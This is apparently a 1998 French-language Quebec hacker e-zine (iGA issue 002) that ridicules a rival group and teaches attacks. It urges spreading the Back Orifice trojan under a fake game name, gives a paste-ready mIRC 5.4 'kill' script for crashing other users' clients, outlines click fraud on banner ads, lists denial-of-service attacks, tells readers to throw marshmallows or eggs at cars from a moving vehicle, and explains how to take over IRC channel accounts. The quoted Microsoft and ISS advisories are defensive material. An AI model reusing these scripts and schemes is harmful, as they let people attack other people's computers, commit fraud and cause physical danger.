   __                     .      /\         /\ 
   oo                ==  / \====/  \ ======/  \
   \/                == /  /=  /    \==  =/    \    iLLEGAL gRANTED aCCESS
  /|\                ==/% /== /% /\  \=  /% /\  \   - -- --- ---- --------
 < | \  _______      =/  / ==/  /  \/== /  / /  /         {Issue 002}
  `|  O _|_|_|_|     /  /  =/  /===  ==/   \/  /
   |>  |_|_|_|_|    /  /   /  / /\=  =/  /\   /     "Be Back to Phuck You"
  <|   \ |_|_|_|   /  /   /  / /  /  /  / /  /
   `-   0     0   | %/=   \  \/ %/= /  / / %/
                   \/==    \ _  /== \ / /_ /       DontForget:UNDERNETSuXX.
 
===[iGA002.txt]======================= ======== ====== ===== ==== === == =
   Avec des ami(e)s comme iGA, pas besoin d'enemies...
===[iGA002.txt]======================= ======== ====== ===== ==== === == =
 
===BEST BEFORE===

   Jamais 1 sans 2 :-) Welcome Back, on a decider cette fois-ci de  pondre
   quelque chose de plus juteux que le premier on a aussi pus    constater
   que les beaux Wannabes hackers sont aussi bons qu'un newbie sur #quebec
   alors nous avons releaser des choses TRES PUISSANTE et d'autres  plutot
   basique...


   LE SPECIAL DU MOIS: "L'ASTUCE" Pour CRACKER DES X/W!

   Ca va rocker dans cette issue je vous le garantie.


			Les Channels du mois: #UHA, #HACKPREAK et #AGGRESSOR

								[STAFFz]




==REGULAR STAFFz==

   ___       iGa.Judah   [WR]  : Faut croire que cest standalone again
   QWZYKX    iGa.Judah   [WR]  : bof au moins c'est de qualité ;-)
   |JaCKeL|  iGa.Judah   [WR]  : K-FLEX rulez
   Hauptmann iGA.Sniper        : Without SniperRiffle
   Gazou     iGA.eleete        : Gazou Rulez! Lambi2 Suxx
   J-A-K-E   iGA.Bscout        : WWW.MTLHACKERS.COM WebMaster
   Crik      iGA.Bscout        : ...
   [X-F3AR]  iGA.Bscout        : 3133+3
   [-ODiN]-] iGA.Janet         : iGa was here!
   KXZ       iGA.Janet         : Pas revu depuis un bout...
   AnDreW-   iGA.Peon          : Happy Newbie

==SOBORINGLUSERS==

   |Daemon|  : No a Shadowed Passwords 3133+3! Notre mascotte officielle!
   Lambi2    : Ma vous denoncez a la GRC
   PING      : PONG
   DraGguard : Repetez encore et je vous grille de mon souffle de feu!!!


-RockHill.SC.US.Undernet.Org- Highest connection count: 5 (4 clients)


==============================MONTHLY TOPICz================================

*** dom_19 has quit IRC (Bonjour je m'appel [-Fox-], le hackeur, je nuke tout le monde sur sorel, j'suis hot!!)


  01 - uHa Rulez or go to #iUHA and laught
  02 - Le Fameux BO {Back Orifice ou plutot How to control remotly}
  03 - Slicks And the Outlags Project 001
  04 - DOS #2    La Fameuse Suite sur les Denials
  05 - MashMAllow Annoying Device Exploit
  06 - Le Fameux Mirc Kill 5.4
  07 - La refence W/X pour les janettes
  08 - Annoying ShittyFull Tip
  09 - Some sort of Social Phuking live
  10 - Sniffer ca Victime! (X/W)
  11 - Le HiiJaking de (X/W) non sensuré{Complet)
  12 - Comment garder son (X/W) account
  13 - BabyLand FunnPark!
  14 - End/Conclusion


=[01]=========================================================================
         #UHA L'explication et l'analyse... 
==============================================================================


Vous saviez tres cheres partisans, que notre premier issue est sorti quasiment
en meme temps que le fameux et grandiose UHA! Le vrai magazine de h/p/c/v/c,je
connaisait pourtant deja le h/p/v/a/c bordel!

Avec comme membres initiaux: [DaEmOn], personne d'autres faut croire! pfff...

Donc ce GROUPE also called 1 personne, est bien entendu un TRES GROS GROUPE DE 
HPCVC (uha reinvente les termes!yeah) rependu un peu partout et nous,  pauvres
limaces, dans un exces de bonté de leurs pars, pourrons lire ce fameux topic:

1.Le début
2.Kess qu'un passwd file
3.Comment les trouver
4.Shadowed passwd file 
5.Comment les Unshadowed
6.Les cracker (soft)
7.Conclusion


Hummm assez douteux, moi jappel ca Cracker Jack Homepage longtemps... Tellement
professionelle que notre chere animal de compagnie dirait:

"J'avais déjà écris 2 putain de page pis caliss Winblowz ma planté dans face.."

On le reconnais aussi par la mutltide de ... qui laisse derriere lui, IGA     ne
racculant devant rien, a ressenser tout ses points: 210 points apres la premiere
article, je suis taneee ;-) Mais plus y a de point plus c'est interessant...

J'aime bien son beware:

#############################################################################
#                      Rajout après le 1er article                          #
# CRISS DE TABARNAK DE CIBOIR DE CALISS...je viens de lire le 1er ezine de  # 
# IG@ c de la criss de putain de merde...on a prend rien la dedans...en t k #
# moi a part leur petit truc de classification a chier...j'ai rien appris...#
# en t k...ca c après le avoir écris le 1er article....                     #
#             IG@ je vous dit : A CHIER VOTRE ZINE ! ! ! ! ! !              #
#############################################################################

TRES mais quand je dis tres, vraiment foul tres professionelle!

allons decortiquer maintenant se quil dit:

1 - Introduction a un monde nouveau, remplis de petit (...) et de jurons!

2 - Kess qu'un passw, sans vouloir vous offensez j'ai lus un NPC De  1992
    mexpliquant exactement la demarche du 3-4-5-6... y faut etre a   jour 
    des fois!

3 - Les Trouvees avec une cross qui marchait deja pus en 1994!

4 - Shadowed Passw, tout nouveaux, pfff cetait deja la en 1991

5 - Comment les unshadower avec un bo source code ripped-off

6 - Tiens du SoftWare Spamming, Commanditer par WWW.DOWNLOAD.COM?

7 - Conclusion, on sen fout pas mal de la conclusion...


--------
Mais que serait #UHA sans ses powerfulls TRojan a la QuickBasic4.5

N.B: iGA vient de surplanter notre ami de #UHA en releasant son nouveau
     trojan en BASICA 3.0 !!!


================trojan_full_powa_3133+3_de_lenfer!.bas============================

0 CLS
1 PRINT "Please Wait, but not too much"
2 PRINT "."
3 GOTO 2 

======================================={EOF}======================================
Tres powerfull , deal with carefully..!

Donc en resultat, MR se plaignait que iGA ne donnait pas d'informations utiles  , 
Alors nous avons pensez placer plus d'information #UHA dans notre magazine!!!!
Et oui, notre nouvelle coqueluche nationale : |DaEmOn| !



						Its A beautiful Day, Wr (___) 



<|DeAmOn| said> Je vais continuer même si le FBI est a mon cul...Je chierai pas dans mon froc comme eux.(#HACK.fr)





=[02]=========================================================
           Nouvelle ATTAQUE, le BACK ORIFICE             ****-
==============================================================

Un nouvel attack vient de naitre, il y a de ca 1 ou 2 semaine,
vous etiez tanner des fameux sockets ben lame, alors CDC  rise
it  back!!!   CDC  cest un groupe (Cult of the Death Cow)  qui 
existe depuis 1986, se specialisant dans leurs textes de hpvac
et leurs DEFCONS (party). Ils ont fabriquer un nouveau type de
SOCKET DE TROIE, LE Back ORIFICE, qui a causer deja   beaucoup
de dommages, Seul Inconvennient: Ne Cible Que les usagers sous
Microsoft (Like Windows 95/98). Le Fonctionnement?

2 logiciels de base!

Le Client (BOGUI.EXE/BOCLIENT.EXE) et le Server (BOSERVER.EXE)
Le client et innofensif, mais le Serveur est en fait comme  le
fameux DMSETUP.EXE! Vous le renommez,   donner  y  un  nom  et
envoyez le a tout le monde (moi je lavais renomer  tetri2.exe)
et je l'avais caller Tetrinet 2.0 :] Mais    contrairement  au
SOCKET DE TROIE, le Port (defaut=31335) est customizable  dans
le virus! Beaucoup d'options sont aussi possible, en   passant
du reboot au lockup system, y a le fameux TEXT_BOX et on  peut
meme piquer le pass du provider!

Ou Trouver ce bijoux? --> SUR NOTRE SITE BIENSUR :-)
Il y a deja plus de 35 0000 copies du logiciel en circulation!

More Infos 
----------------------------------------------------------------------------------------------
Microsoft Security Bulletin (MS98-010)



Information on the "Back Orifice" Program 

Last Revision: August 7, 1998 

Summary
On July 21, a self-described hacker group known as the Cult of the Dead Cow released a program called "Back
Orifice," and suggested that users of Microsoft® Windows® were somehow at risk from unauthorized attacks.
Microsoft takes security seriously, and has issued this bulletin to advise customers that users of Windows 95 and
Windows 98 following safe computing practices (including not installing software from unknown and untrusted
sources) are not at risk. Additionally, users of Microsoft Windows NT® and the Microsoft BackOffice® suite of
products are not threatened in any way by this tool, since it does not even run on Windows NT.

The Claims About "Back Orifice"
It is unclear from the author's statements what "Back Orifice" is intended to do. In the press release that
accompanied its release, "Back Orifice" is alternately described as an administrative tool or as something that
demonstrates some security vulnerability in the Windows platform. 

The author claims the program can be used for legitimate purposes, such as: 

     remotely controlling and monitoring a Windows computer 
     reading everything that the user types at the keyboard 
     capturing images that are displayed on the monitor 
     uploading and downloading files remotely 
     redirecting information to a remote internet site. 

There are many well supported commercial tools that provide this functionality today. 

The Truth About "Back Orifice"
"Back Orifice" does not expose or exploit any security issue in Windows, Windows NT, or the Microsoft BackOffice
suite of products. 

As far as demonstrating an inherent security vulnerability in the Windows platform, this is simply not true.  "Back
Orifice" could introduce security vulnerabilities in the system on which it is installed, but, as with all other
software, a user must make the choice to install it.  Anytime a user installs software from unknown or untrusted
sources, they risk compromising their system. 

For "Back Orifice" to introduce a security vulnerability on a system, a chain of very specific events must occur: 

     The user must deliberately install, or be tricked into installing the program 
     The attacker must know the user's IP address 
     The attacker must be able to directly connect to the user's computer.  A properly-configured firewall will
     prevent a direct connection and thus defeat a "Back Orifice" attack.   

What Does This Mean for Customers Running Windows 95 and Windows 98?
"Back Orifice" does not pose a threat to users of Windows 95 or Windows 98 who follow reasonable and safe
Internet computing practices, such as not installing software from unknown and untrusted sources. Windows 95
and Windows 98 offer a set of security features that allow users to safely use their computers at home or on the
Internet. Like any other program, "Back Orifice" must be installed before it can run. Users should prevent this
installation by following good practices such as not downloading unsigned executables, and by insulating
themselves from direct connection to the Internet with proxy servers and/or firewalls wherever possible. 

What Does This Mean For Customers Running Windows NT?
There is no threat to customers of Windows NT Workstation or Windows NT Server; the program does not run on
the Windows NT platform. The author of "Back Orifice" do not directly claim that their product poses any threat to
Windows NT, even though it seems to be implied.

What Customers Should do
Customers do not need to take any special precautions against external "attacks" from this program, since it
would need to be installed on their system before any vulnerabilities could be created. However, customers should
ensure that they follow all of the normal precautions regarding safe computing: 

     Customers should keep their software up to date and should never install or run software from unknown
     sources -- this applies both to software available on the Internet and sent via e-mail. Reputable software
     vendors digitally sign their software available on the Internet to verify its authenticity and safety. 
     Corporate administrators can block software that is not digitally signed by a reputable or authorized
     software company at their proxy server and/or firewall. 
     Customers should keep their software up to date to ensure that hackers cannot take advantage of known
     issues. 
     Companies should actively use auditing and monitor their network usage to deter and prevent insider
     attacks. 

More Information
The following sources provide additional information about this issue: 

     ISS Security Alert Advisory, "Cult of the Dead Cow Back Orifice Backdoor"
     http://www.iss.net/xforce/alerts/advise5.html 
     Russ Cooper's posting about 'Back Orifice'" on NTBugTraq 

Revisions

     August 4, 1998: Bulletin Created 
     August 7, 1998: Bulletin Updated, minor changes and additional links 

For additional security-related information about Microsoft products, please visit
http://www.microsoft.com/security 

---------------------------
ISS Security Alert Advisory
August 6th, 1998

Cult of the Dead Cow Back Orifice Backdoor

Synopsis:

A hacker group known as the Cult of the Dead Cow has released a Windows
95/98 backdoor named 'Back Orifice' (BO).  Once installed this backdoor
allows unauthorized users to execute privileged operations on the affected
machine.Back Orifice leaves evidence of its existence and can be detected and
removed.  The communications protocol and encryption used by this backdoor
has been broken by ISS X-Force.

Description:

A backdoor is a program that is designed to hide itself inside a target
host in order to allow the installing user access to the system at a later
time without using normal authorization or vulnerability exploitation.

Functionality:

The BO program is a backdoor designed for Windows 95/98. Once installed it
allows anyone who knows the listening port number and BO password to
remotely control the host.  Intruders access the BO server using either a
text or graphics based client.  The server allows intruders to execute
commands, list files, start silent services, share directories, upload and
download files, manipulate the registry, kill processes, list processes, as
well as other options.

Encrypted Communications:

All communications between backdoor client and the server use the User
Datagram Protocol (UDP).  All data sent between the client and server is
encrypted, however it is trivial to decrypt the data sent. X-Force has been
able to decrypt BO client requests without knowing the password and use the
gathered data to generate a password that will work on the BO server.
The way that BO encrypts its packets is to generate a 2 byte hash from the
password, and use the hash as the encryption key. The first 8 bytes of all
client request packets use the same string: "*!*QWTY?", thus it is very
easy to brute force the entire 64k key space of the password hash and
compare the result to the expected string. Once you know the correct hash
value that will decrypt packets, it is possible to start generating and
hashing random passwords to find a password that will work on the BO
server. In our tests in the X-Force lab, this entire process takes only a
few seconds, at most, on a Pentium-133 machine. With our tools we have been
able to capture a BO request packet, find a password that will work on the
BO server, and get the BO server to send a dialog message to warn the
administrator and kill its own process.

Determining if BO has been installed on your machine:

The BO server will do several things as it installs itself on a targethost:
* Install a copy of the BO server in the system directory
(c:\windows\system) either as " .exe" or a user specified file name.
* Create a registry key under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
with the file name of the server file name and a description field of
either "(Default)" or a user specified description.
* The server will begin listening on UDP port 31337, or a UDP port
specified by the installer.  You can configure RealSecure to monitor for
network traffic on the default UDP 31337 port for possible warning signs.
In order to determine if you are vulnerable:

1. Start the regedit program (c:\windows\regedit.exe).2. Access the key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices.
Look for any services that may not have been intentionally installed on the
machine.  If the length of one of these file is close to 124,928 (give or
take 30 bytes) then it is probably BO.Recommended action:
BO can be removed by deleting the server and removing its registry entry.
 If possible, you should back up all user data, format your hard drive, and
reinstall all operating systems and software on the infected machine.
However, if someone has installed BO on your machine, then it is most likely
part of a larger security breach.  You should react according to your site
security policy.Determining the password and configuration of an installed BO:
1. Using a text editor like notepad, view the server exe file.
2. If the last line of the file is '8 8$8(8,8084888<8@8D8H8L8P8T8X8\8'8d8h8l8',
then the server is using the default configuration.  Otherwise, the
configuration will be the last several lines of this file, in this order:
<filename><service description><port number><password>
<optional plugin information>

Conclusion:

Back Orifice provides an easy method for intruders to install a backdoor on
a compromised machine.  Back Orifice's authentication and encryption is
weak, therefore an administrator can determine what activities and
information is being sent via BO.  Back Orifice can be detected and
removed.  This backdoor only works on Windows 95 and Windows 98 for now
and not currently on Windows NT.

----------

Copyright (c) 1998 by Internet Security Systems, Inc.
Permission is hereby granted for the redistribution of this alert
electronically.  It is not to be edited in any way without express consent
of X-Force.  If you wish to reprint the whole or any part of this alert in
any other medium excluding electronic medium, please e-mail xforce@iss.net
for permission.

Disclaimer

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at
the user's own risk.

X-Force PGP Key available at:   http://www.iss.net/xforce/sensitive.html as
well as on MIT's PGP key server and PGP.com's key server.
X-Force Vulnerability and Threat Database: http://www.iss.net/xforce
Please send suggestions, updates, and comments to:
X-Force <xforce@iss.net> of Internet Security Systems, Inc.


----------------------------------------------------------------------------------------------
Pour ceux qui ne l'a pas encore compris, le virus executée se
deplace dans votre C:\WINDOWS\SYSTEM et se charge a chaque fois
en memoire mais comme il n'a pas de nom, vous ne le voyez pas!!
Un Truc pour savoir si vous etes infectée, CHARGER BOGUI.EXE
et mettez 127.0.0.1, faite un ping host, si on voit le Nom  de
votre ordinateur, c'est que vous l'avez:

Comment le remover?

2 facons!

1- Booter en Ms-Dos, effacer le virus dans le C:\windows\system
   il s'apelle .exe ou plutot ~1.exe je crois. 

2- Avec BOGUI.EXE faite un Process list et remover celui du .exe
   apres effacer le avec l'exploirateur windows(C'est le premier)
   dans le repertoire (C:\windows\system) 


Apres avoir essayer ce logiciel (ce serveur/client) je peux vous
dire que le SOCKET DE TROIE St'un gadget!!! :-) Le concept reste
lame pareil la....ps: une version pour linux circule t00

*************************MASTER*PARADISE***********************

Une nouvelle version appeler MASTER PARADISE se retrouve a etre
beaucoup plus performante que le Back ORifice, ca creation date
de pas trop longtemps et elle est selon moi plus UNLIMITED,elle
permet de faire des captures decran du victim host sans a avoir
a   taponner un .BMP, un access a son ROOT comme si vous seriez 
dans l'explorateur WINDOWS...

***Find It at our Web Site!************************************


Maintenant vous savez tout sur B_O  -----------wr(___)





<|DeAmOn|> J'espère que dans votre tête ya rien de mêler en t k dans la mienne tout va bien si ce n'est que de la fatigue



=[03]======================================================================
	CashFlow via WWW so maybe called Project "Slicks And The OutLags"
	Part #1..to be continued
===========================================================================


Tout le monde tient a savoir comment faire de l'argent en etant sur le net?
Non, car quelque uns en font ou connaisse une methode. Otez-vous les choses
trops complexes, the only one way to do money cest le Abusive Banner Addzz.
C'est a dire les fameuses compagnies qui vous payent 2-20sous par click sur
leurs bannieres.


J'explique, cela peut paraitre confus pour certain:

Une Banniere look like thats:


 _____________________________________________________________
|					       [XPICS.COM.INC]		  |
| *CLICK HERE!*		CA CEST UNE BANNIERE!		        |
|							     			  |
|	DONT WASTE YOUR TIME ANYMORE,	FREE SEX HERE!!!!!        |
|_____________________________________________________________|

les bannieres qui sont deja 
sur le WEB en beaucoup plus beau et cela sur des sites webs, alors sachez
que  les   Webmasters (operateurs,admins) de ses sites webs recevait    un 
montant de 2 a 20 sous pour chaques clicks sur cette banniere.

Ah ca commence a germer dans la tete? Un Exemple courante... Monsieur  "X"
se fait un site WEB avec un gros trafics, y rajoute ses bannieres de cul,
comme 10 % du monde click dessus, ben y se fait beaucoups de click,  donc
beaucoup d'argent.

PROBLEME! Faut avoir du trafic, alors faut un website Serieux, nah pas le
temps de faire ca! Alors on va switcher au deuxieme plan: ABUSIVITY!!!!!!
Vous devez partir de l'idee suivante: L'ordinateur qui enregistre     les 
"Click-thru" sauvegarde le IP de la personne qui le fait pendant environs
6 a 12h. Donc un click sur cette banniere      ne  pourrait pas etre tout 
simplement repeter par cette meme personne. Mais alors, il faut   changer
son IP apres chaque click, humm Se Deconnecter du serveur Internet    est 
une bonne facon d'acquerir ce resultat, se reconnecter par la suite,  re-
faire le click et se deconnecter, ainsi on pourrais faire 2-20sous par  3
minutes, se qui donne un bo resultat de : 40 sous ou 4,00$ de l'heure ...

PROBLEME#2! A chier, sa paye pas! Nah ca cest 4,00$ pour chaque banniere,
si vous en mettez 8 de 8 compagnie differente votre gain augmente a 4*8 ,
32$ de l'heure... Ca commence a avoir du sens, Vous allez me dire     que 
c'est plus long? Nah, se qui est le plus long cest de reconnecter... dans
le temps ou se projet vu le jour, nous abusions de XPiCSInc une compagnie
qui avait l'avantage de fournir 7 services de banniere en un, avec     un 
cheque seulement par mois, et non 7 plus petits!... Mais XPiCS etant  les
leaders du domaine on rajouter quelques principes, si vous voulez    vous 
pratiquez je crois que le web_page:www.xcash.com/advert si ma memoire est
bonne. Ne perdez pas votre temps avec ceux qui ne paye que pour la  vente
et non le click [comme c'est vous seulement qui faites vos clicks :---) ] 

Nous avions meme inventer des outils (robots) qui fesaient les     clicks
pour nous, mais ce projet c'est quoi? Simple, depuis quelque peu     nous
remarquons la re-apparitions de se type de service, alors nous nous   re-
mettrons en branle et dans le prochain issue : Un programme qui click  et
les places safes a voler! :-)

N.B:  Vous etes payez en argent U.S. :-) Alors cest pus 32$ de lheure...!


	Slicks And The Outlags Project 001 (Z) opyrinn iGA 1998
				wr(___)


<|DaEmOn| Said> Ouin...fak..criss...callisee...spa...ca...mais..bof..3133+3...a..lost....chuit...hot...vous..savez...

=[04]===================================================================
      Denialz of Service Part #002
========================================================================

Jai decider de recommencer ce pack plus clairement voici avant tout tout 
les DENIALS De base connues a nos jours...

SMB - ServerMessageBloc Logon Attack        --Target: Windows NT
      Fait freezer ou rebooter Windows NT!
      Une attaque assez peu connu... 


BONK- Boink, NewTear, TearDrop2             --Target: Windows 95 / NT
      L'ordi plante ou tout simplement
      vire au bleu (same que 139 suxx)
      
LAND- Freeze et BOUM! 			    --Target: Windows 95, NT4, 311, etc..

TEARDROP- Tear, TCP/IP Fragment Bug,        --Target: Win95,NT,3.1,Linux > 2.0.32
	  OverlapFrag Bug 
         
          Crash immeditaement et Reboot


CLICK- Original Nuke, ICMP Nuke, ICMP_UNREACH  --Target: Nimporte Qui (TCP)
       WinNewk-X

       Deconnection d'IRC

SSPING- Jolt, sPING,iCMP bug, IceNEwk, POD     --Target: Microsoft in priori  
        Freeze system

WINUKE- OOB,Winnuke, Winnewk                   --Target; Windows 95,NT,3.11
        Attaque sur le port 139 qui
        fait tournee lecran au bleu

ICMPFLOOD- Ping Flood                          --Target: MODEMS
           Te fais lagger ou deconnecter

SMuRF- Un Flood ICMP mais sur un serveur entier --Target: IRC Servers par exemple :]

--------
Ceci va etre les Denial of Service quon risque d'approchez dans les prochains 
issues... Commencer deja a vous informer!





							WR(___)

To be continued...


<|DaeMOn| said> Ma maman disait Stupide n'est que l'a stupidité.

=[05]=========================================================
           Mashmaling Guimauves or ANNOY on the ROAD     
==============================================================

Il est 00h30 ..    (donc TARD ou de BONNE HEURE) rien a foutre
ca c'est sur , pis comme  ya pas  de  meilleur  tripes que des
tripes LIVE, bein on vas en faire un.. un autre! 00h30 ca veux
dire que le stand de beignes est deja close :( donc faut aller
ailleur mais HO malheur  pas de cash non plus, la solution est
simple AGAiN,un tour chez la mere pour y demander de la bouffe
( sachant  que vous manger pas  n'importe quoi a vas peut-etre
vous vommir un peu de Cash .) Bein non,  meme pas a vous donne 
juste deux cans de pois verts pis un gros sac de guimauves des
plus miniatures. How to have phun with this ?  Simple encore ,
Il vous faudra une voiture ( plus pratique pour se sauver ) et
encore  quelques amis  (  plus pratique quand vous vous faites
pognier.) La cible: un bo ti coin calme est OPEN ... I CALL OF
CURSE :  LES  DEp. COUCHE TARD  y vous ont fait chiez pour les 
beignes,on vas prendre une revanche,  aller sur le parking pis
trouvez vous une cible,shooter les mini-projetiles en masse et
crisser votre camps. Une variante  intressante  du  Mashmaling 
Annoy Shoot c'est quand tu roule en char pis qui a un flacheux
qui te colle au cul , SOLUTION , qq'un qui chauffe !!!! pis un 
MashSniper at your side.  Attendez  que la cible s'approche et 
pitcher somes Annoy devices sur lui(N.B:Vous pouvez simplement
lacher le  projectile ,  a la vitesse de roulement ,  la cible
devrais  le recevoir  facilement  sans trop de vizous )  .  Et
le plus important  a ne pas oublier,    OBJECT  ON  MIRROR ARE
CLOSER  THAT THEY APPEAR. Vous pouvez aussi pitcher le   reste
du sac a terre pour voir les  ti-rebonds  que  ca fais pendent
10 sec(S.V.P. Eviter les polices qui roules en sens inverses).

Spetial Notice :
Si vous posseder une voiture qui peut generer plus  de  200 HP
Vous pouvez changer les guimauves pour des oeufs, plus solides
et plus devastateurs qui difuse  un rayon de  2 po. autours du
point d'impact.


At end: Dont Forget, Masmallows is more effective when melted!

BEWARE: Tenez les mashmallows annoying devices loint des yeux,
des nouveau-nées ou des femmes enceintes.

					---wr:(Qwzykx)---



<|DaEmOn| said> Il ne sont pas effaçables désoler...Hehe non mais il faux un format 


=[06]=================================================================
	Like a T-File or so called Comment tuer Mirc 5.4!         **---
======================================================================

Pour tuer il existe une panoplie d'armes puissantes,  cette    attaque
est harmless et surtout facile a faire, assez pour m'interesser a   en 
parler ici. J'ai decouvert ca tout paisiblement sur www.mtlhackers.com
le fameux website de hacking officiel montrealais a J-A-K-E. l'enfance
de l'art..



1-Track Your Enemy!

  Cest un bug quon peut exploiter contre les victimes qui possede  le
  fameux MIRC 5.4...

  Alors vous faite des beaux /ctcp NICK version pour savoir quel version
  il utilise tout simplement...


2-Get_the_power
  
  Cut_paster ceci dans votre alias.ini

----Cut here----

/m54kill {
if ($1) {
.ctcpreply $1 ping $!quit(I'm, a, DALnet, KiDDie)
%ip = $rand(600000000,4294967294)
.quote privmsg $1 : $+ $chr(1) $+ DCC SEND $r(1,99) $+ .txt %ip $r(113,9000) $+ $chr(1) $+ $lf $+ privmsg $1 : $+ $chr(1) $+ DCC RESUME $r(1,99) $+ .txt $+ $chr(1)
.ctcpreply $1 ping $!asctime(2147483647)
echo -a * Sent mIRC kills to $1
halt
}
echo -a * Parms [/m54kill nick/#channel]
}

----Cut here----

apres vous tapez /m54kill lenick pis paf y part! C'est assez simple ca,
le kill envoie 3 petites commandes dont 5.4 est tres sensible un    DCC
RETRIEVE, des CtcpReply avec Events

Ca faut juste un deconnect like a CLICK NUKING!


Apres avoir checker les patchs qui sont sortis je vous conseille largement
dallez downloader MiRC 5.41 pour beaucoups moins de probleme qu'une simple
patch!



				Leeched from WWW.MTLHACKERS.COM (___)

<|DaEmon Said|> Les essaies en clinique nous on prouvé que la formule antitartre du dentifrice CREST reduit la
                carie et aide a prevenir l'accumulation de tartre au-dessus des gencives. 

=[07]=======================================================
        We gonna start the JANETTE educationly sys.
              (Newbie`s wanna know`s more!)
============================================================

Ouins pkoi ya un X pis un W sur Undernet.. j'avoue que c'est
mal pense, ca l' aurait  pu  etre  un  seul  Bot  comme  sur
d'autres serv. ou un op automatique. Mais non ya falut   qui
nous donne deux bots toujours sur l'cul qui lag au cotton.En
plus ces guedies la sont mal organise !   Mais sa fait rien;
c'est pour ca que je les aimes !!

=Step[001]=

X  et  W  sont la pour faire reignier l'ordre (pfff) sur les 
channels d'Undernet, la plus part du temps ca  marche  bien,
j'avoue que ca nous debarasse des ti con genre : EIle MR.  c
mon  channel a MOI bon, j'etais la le premier OU  EIl  c  le 
channel le notre gang bon.Allez vous sur le site de Cservice
vous allez voir que X pis W  de la  GROSSE  pub  pis que  ca
porte la lettre des places qui les host! Mais  faut     dire
que pour nous autres, X pis W  sont  des  preuves   vivantes 
(voyer ici le jeux de mots) que c'est tellement bien    fait
Undernet!! Le gros fun avec ces BOt la c qui sont facile   a
controler pis que tousle monde en veux !! (ya qua voir    la
liste de demandes!) Si vous avez deja poceder un de ces bots
vous  avez  surement  deja   remarquer   a   quel   point  c
customisable pis powerfull. Vous pouvez meme pas le kicker !


=Step[02]=

Voici venu la partie que j'appelle intressante et instructive.
Apres ce chapitre la vous allez etre en mesure de savoir  quoi
faire si un loser ecris son password sans faire exipres   dans
un channel. Ou encore si qq'un vous trouve trop  HOt  pis  qui
vous donne un access sur X ou W. Bon, W pis X marche selon une
base d'access qui divise les usagers selon un niveau d'access,
vas sans dire que plus le niveau de l'usager est haut, plus il
peut accomplire des  taches  qui,  disont,  demmande  plus  de 
responsabilite .  Quand   vous   entrez   dans  la  grande  et
merveilleuse famille de W ou  X  vous  ete repertorier  de  la
facon suivante : Votre NICK, Votre IDENTD, VOTRE DOmaine   pis
votre niveau dans le channel. Et bien sur le tout vien avec un
password que vous avez choisit !  Le premier a avoir un access
sur W/X c'est le niveau 500 ( celui qui a fait la demande)  Et
non c'est pas parce que vous avez ecris parmis 10 autre e-mail
que vous avez un access deja fait, ca c la job du 500 de  vous
setter votre access. Feson un   review des access pis checkons 
les commandes qui a a faire avec chaques niveaux( ya du stock)

Les niveau parte de 0 a 500:



==[Le niveau 0 : Tous le monde]==

=[Les commandes :]=

[ACCESS]
Typographie :
/msg X,W access #channel <nick|IP> [options]
Vous permet de checker une personne ou un groupe de personnes qui sont dans la liste
de X/W.
Ex:
/msg X,W access #channel *!*@*.gnn.com
Ca ca vas vous sortit toutes les personnes qui sont sur le IP ".gnn.com" dans la liste
de X/W (pour ce channel la!)
Vous pouvez encore vous servire des tires "*" pour simplifier votre recherche genre :
/msg X,W access #channel *
Ca ca vas vous donner tous le monde sur X/W

Access options 

     -min level - Ca donne les personnes en bas du niveau marquer
     -max level - Ca donne les personnes en haut du niveau marquer
     -autoop - Ca vous donne les personnes qui sont en AUTOOP mode
     -noautoop - Ca vous donne les personnes qui sont pas en AUTOOP mode
     -modif - Vous montre qui a ete le dernier a modifier cet access

Access Flags : Les 4 lettres a fin

 -X- USER: Blahguy- (*!*username@*.blah.com) ACCESS: 1 LMPU
 -X- CHANNEL: #cservice -- AUTOOP: ON


     M = Modifier, mais non saver, la user list se save automatique aux 90 min.
     P = Qui a un password
     U = L'usager et presentement Autentifier
     L = Loaded en memoire, un access reste lister en memoire pour 90 min
	 apres que le gars ye partit.

[BANLIST]
Typographie :
/msg X,W banlist #channel
Vous donne la banlist du channel 
Vous devez etre sur le channel pour que ca marche.

[CHANINFO]
Typographie :
/msg X,W chaninfo #channel
Affiche si le channel est enregistrer ou non pis a qui qu'il est.

[DEAUTH]
Typographie :
/msg X,W deauth #channel
f you have sent you password already and would like to
deauthenticate yourself. Use this command.

HELP : syntax - /msg X,W help [command] : Displays help file on a given command.

[LBANLIST]
Typographie :
/msg X,W lbanlist #channel <IP> 
Vous donne la ban list Recorded de X/W plus les raison du ban avec les levels
Utiliser la tite star "*" pour toute les voir.

[LOGIN]
Typographie :
/msg x@channels.undernet.org login #channel <password>
OU
/msg w@channels2.undernet.org login #channel <password>
C'te commande la marche juste pour les levels 500 qui sont autentifier pour la
premiere fois, donc c'est la commande la plus importantes pis aussi
celle qui est utiliser une seul fois !

[MAP]
Typographie :
/msg X,W map
Vous montre la liste des Serveurs pluger

[MOTD]
Typographie :
/msg X,W motd
Affiche le message du jour, Esseyer le une fois par 6 mois, sont un peux
lent a changer je pense... ca doit etre acause que c un GROS bot full compliquer !!!

[NEWPASS]
Typographie :
/msg X@channels.undernet.org newpass #channel <password>
OU
/msg W@channels2.undernet.org newpass #channel <password>
Cette commande vous permet de changer votre password par vous meme.
(pratique quand tu vole un access, tu change le pw comme ca les autres
peuvent pu la prendre!)

[PASS]
Typographie :
/msg X@channels.undernet.org pass #channel <password>
OU
/msg W@channels2.undernet.org pass #channel <password>
Ceci vous permet de vous Autentifier de facon a avoir access a votre
access sur X/W.
Ex:
Si vous avez un level 200 bein c'ta commande la vous premet de rentrer
sur votre level 200.

[SHOWCOMMANDS]
Typographie :
/msg X,W showcommands #channel 
Ca te montre toute les commandes que tu peux utiliser dans un channel
(Mais sa si tu lis bien ce texte la tu devrais pas en avoir besoin!)

[SHOWIGNORE]
Typographie :
/msg X,W showignore
Vous montre la liste des personnes ignorer par X/W
Ca ca arrive quand qq'un Flood accidentellement X ou W
Habituellent le gars est ignorer pour une heure ( 60 miin)

[VERIFY]
Typographie :
/msg X,W verify nick
Affiche si oui ou non qq'un est vraiment un representant de Cservice.
(un genre de IRCOP mais qui s'occupe de X/W pis des channels)


==[Le niveau 50]==

=[Les commandes :]=

[KICK]
Typographie :
/msg X,W kick #channel <nick> [reason]
